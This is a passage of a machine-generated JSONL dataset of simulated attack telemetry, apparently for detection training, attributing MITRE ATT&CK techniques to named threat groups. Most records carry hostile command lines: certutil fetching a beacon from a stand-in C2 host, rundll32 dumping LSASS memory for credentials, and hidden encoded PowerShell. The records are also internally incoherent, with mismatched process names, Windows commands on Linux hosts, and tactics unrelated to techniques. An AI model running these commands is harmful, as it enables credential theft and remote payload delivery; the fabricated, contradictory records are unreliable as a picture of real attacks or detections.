(DS0017)","timestamp":"2025-01-14T04:27:18.000Z","user":{"name":"arn:aws:iam::2vdohs9lbm4x","sid":"S-1-5-21-872852341-475472511-2913"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration","Initial Access"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20250204T120641000Z_0019697","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.187.41.160","name":"APP-WEB-Y9LTAA81LQ","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19697Mustang PandaT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.86.64.211","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-05-26T22:04:10.000Z","user":{"name":"azuread\\fgl0f9vbz4n0","sid":"S-1-5-21-579264241-400110771-7542"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Collection","Impact"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20250121T163636000Z_0019699","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.99.184.117","name":"EC2-INST-WFI8MFU8Q2","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19699Mustang PandaT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.143.123.46","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-07-24T05:46:27.000Z","user":{"name":"arn:aws:iam::athjfz86mts1","sid":"S-1-5-21-417759499-386998808-3582"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration","Defense Evasion","Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20260801T100227000Z_0019701","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.143.141.243","name":"AZURE-VM-5I93XVFEV4","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19701Mustang PandaT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.145.169.72","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-10T13:53:11.000Z","user":{"name":"arn:aws:iam::wcvbzibkg98m","sid":"S-1-5-21-624346904-796906243-1298"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access"],"technique_id":"T1566.001"},"event_id":"evt_unc4841_20251225T211128000Z_0019703","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.11.126.246","name":"AZURE-VM-UA8I7S8N3C","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19703UNC4841T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.186.129.227","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1322 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-11-21T05:00:49.000Z","user":{"name":"i-vsut9r3o30zt","sid":"S-1-5-21-892292095-139233096-4756"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access","Collection"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20260318T145129000Z_0019705","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.148.182.213","name":"WIN-FIN-SRV-1WHVQ2PKZN","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19705APT29T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.143.121.141","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-03-03T06:15:11.000Z","user":{"name":"i-nkzgoyfoy7tl","sid":"S-1-5-21-815687220-534009013-8101"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Privilege Escalation","Credential Access"],"technique_id":"T1570"},"event_id":"evt_lapsus_20250310T192758000Z_0019707","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.133.213.185","name":"APP-WEB-35M7OSFHAG","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19707Lapsus$T1570"},"network":{"domain":"github.com","dst_ip":"1.8.54.113","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-08-19T23:22:49.000Z","user":{"name":"svc_qsidngnsg7n2","sid":"S-1-5-21-866497133-829714894-9475"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Persistence"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20261024T034329000Z_0019709","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.119.5.4","name":"DB-ORACLE-0B1KTAI3WK","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19709APT41T1098.004"},"network":{"domain":"github.com","dst_ip":"1.35.19.189","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2398 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-05-13T03:29:46.000Z","user":{"name":"arn:aws:iam::76m0dk6j52y9","sid":"S-1-5-21-433045341-401217755-1302"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Command and Control","Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20261030T195534000Z_0019711","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.67.23.120","name":"APP-WEB-1GH7ESP9M1","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19711Volt TyphoonT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.53.179.40","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1858 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-20T07:55:42.000Z","user":{"name":"CORP\\l52dqha1fike","sid":"S-1-5-21-220283080-429697849-6614"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Initial Access","Command and Control"],"technique_id":"T1531"},"event_id":"evt_fin7_20261004T034459000Z_0019713","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.18.227.50","name":"DB-ORACLE-0EYKD1J55C","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19713FIN7T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.151.225.203","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3868 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-23T00:27:18.000Z","user":{"name":"svc_z5hoc1lh1j0y","sid":"S-1-5-21-583714491-426875189-9610"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Defense Evasion","Credential Access"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20260704T001648000Z_0019715","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.36.212.30","name":"IAM-ROLE-GUIHPE0738","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19715Scattered SpiderT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.58.230.78","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-16T20:32:54.000Z","user":{"name":"CORP\\yfcme64r1vm3","sid":"S-1-5-21-228812317-200177105-5995"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Lateral Movement","Execution"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20251206T002526000Z_0019717","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.122.30.154","name":"IAM-ROLE-BEWSEAGP0Y","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19717Mustang PandaT1484.001"},"network":{"domain":"github.com","dst_ip":"1.23.133.44","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-03-16T19:40:41.000Z","user":{"name":"svc_fsie27jhg1ub","sid":"S-1-5-21-307481713-656074307-3829"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion","Persistence","Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20250629T192639000Z_0019719","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.144.210.144","name":"EC2-INST-AKUJA9SZGB","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19719Lapsus$T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.164.21.69","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-03-16T20:38:56.000Z","user":{"name":"i-rxl6m7g9qsat","sid":"S-1-5-21-563406505-951008474-7735"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Execution","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20251220T154322000Z_0019721","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.48.74.150","name":"EC2-INST-DL36Q6SQMF","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19721Mustang PandaT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.153.157.11","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1605 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-04-01T10:09:04.000Z","user":{"name":"svc_m6s9pyq4o5vv","sid":"S-1-5-21-896879152-367389789-6525"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Initial Access","Exfiltration","Impact"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20251104T132050000Z_0019723","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.55.205.189","name":"WIN-FIN-SRV-5BU53X4MMZ","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19723Volt TyphoonT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.180.161.160","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-05-27T02:39:55.000Z","user":{"name":"svc_fb8auevkrtwq","sid":"S-1-5-21-586370126-895776278-2409"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Impact","Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20250613T115540000Z_0019725","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.39.146.20","name":"IAM-ROLE-CKG577IERE","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19725Mustang PandaT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.172.52.92","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3669 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-18T15:44:49.000Z","user":{"name":"azuread\\wly0yki7st2z","sid":"S-1-5-21-297359603-518494346-3430"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement","Initial Access"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20261022T110604000Z_0019727","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.202.54.131","name":"DB-ORACLE-836D4I3B67","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19727UNC4841T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.171.168.196","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3099 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-05-23T19:46:38.000Z","user":{"name":"svc_wgwfh840zsa8","sid":"S-1-5-21-835942058-719318688-8777"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Defense Evasion","Exfiltration"],"technique_id":"T1531"},"event_id":"evt_apt41_20250220T095537000Z_0019729","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.2.165.128","name":"AZURE-VM-S3A9EB0IY7","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19729APT41T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.103.234.55","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-08-21T01:09:37.000Z","user":{"name":"i-qny3ehqbj634","sid":"S-1-5-21-764887345-748916535-8375"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20250413T234140000Z_0019731","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.222.238.56","name":"WIN-FIN-SRV-YMXPDEJI4M","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19731Lapsus$T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.96.64.24","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-12-05T10:59:27.000Z","user":{"name":"CORP\\78tb9d9v2da0","sid":"S-1-5-21-521625655-478733715-8825"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Impact","Command and Control","Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20260216T085822000Z_0019733","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.171.51.134","name":"DB-ORACLE-SHI2ON7ZK6","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19733Scattered SpiderT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.37.48.126","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-06-10T18:01:36.000Z","user":{"name":"svc_9umvpppbv5cj","sid":"S-1-5-21-137844707-315002535-4088"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20250121T114154000Z_0019735","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.228.59.137","name":"APP-WEB-ZLO4FUXFRW","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19735APT29T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.161.52.4","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-02-21T18:44:56.000Z","user":{"name":"i-fns58zqnqn6b","sid":"S-1-5-21-917743852-856527366-6264"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Execution"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20250115T034307000Z_0019737","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.76.17.158","name":"AZURE-VM-TOANYNRO1W","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19737Lapsus$T1484.001"},"network":{"domain":"github.com","dst_ip":"1.46.100.112","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1376 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-01T20:50:10.000Z","user":{"name":"i-bwfvyslzi9yh","sid":"S-1-5-21-481233834-501190076-1059"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Credential Access","Initial Access"],"technique_id":"T1531"},"event_id":"evt_apt29_20260101T073850000Z_0019739","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.230.13.140","name":"IAM-ROLE-5BGED36CH9","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19739APT29T1531"},"network":{"domain":"github.com","dst_ip":"1.65.97.51","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-02-27T02:40:00.000Z","user":{"name":"CORP\\ml6wprza3710","sid":"S-1-5-21-661972065-216677047-1971"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Reconnaissance","Privilege Escalation","Defense Evasion"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20250604T115614000Z_0019741","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.70.11.101","name":"APP-WEB-YKZEPUJG3T","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19741UNC4841T1003.001"},"network":{"domain":"github.com","dst_ip":"1.111.126.83","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3323 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-08-08T12:49:04.000Z","user":{"name":"i-fuag12go97ke","sid":"S-1-5-21-836089204-487808739-5962"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact","Privilege Escalation","Collection"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20251209T021744000Z_0019743","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.5.69.21","name":"WIN-FIN-SRV-O1F6VY5FLU","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & 